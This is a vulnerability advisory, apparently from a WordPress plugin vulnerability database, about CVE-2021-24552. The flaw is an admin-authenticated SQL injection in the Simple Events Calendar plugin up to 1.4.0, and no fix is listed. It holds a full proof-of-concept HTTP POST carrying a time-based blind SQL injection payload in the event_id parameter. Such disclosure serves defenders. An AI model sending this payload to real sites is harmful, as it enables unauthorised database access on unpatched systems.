Simple Events Calendar <= 1.4.0 – Authenticated (admin+) SQL Injection | CVE 2021-24552 | Plugin Vulnerabilities

Description

The plugin does not sanitise, validate or escape the event_id POST parameter before using it in a SQL statement when deleting events, leading to an authenticated SQL injection issue

Proof of Concept

POST /wp-admin/admin.php?page=simple-events&tab=existing_events HTTP/1.1
Content-Length: 33
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Cookie: [admin+]
Connection: close

event_id=1%20AND%20(SELECT%204695%20FROM%20(SELECT(SLEEP(5)))wWPs)&delete=Remove

Affects Plugins

simple-events-calendar

No known fix

References

CVE

URL

https://codevigilant.com/disclosure/2021/wp-plugin-simple-events-calendar/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

3482a015-a5ed-4913-b516-9eae2b3f89db

Timeline

Publicly Published

2021-07-24 (about 4 years ago)

Added

2021-07-24 (about 4 years ago)

Last Updated

2022-02-24 (about 3 years ago)

Other

Published

Title

Published

2015-03-18

Title

Easy Digital Downloads < 2.3.3 - SQL Injection

Published

2014-12-03

Title

Google Document Embedder <= 2.5.16 - SQL Injection

Published

2023-04-10

Title

SupportCandy < 3.1.5 - Unauthenticated SQLi

Published

2025-05-07

Title

YaySMTP < 2.6.5 - Authenticated (Administrator+) SQL Injection

Published

2025-07-03

Title

GoZen Forms <= 1.1.5 - Unauthenticated SQL Injection via emdedSc()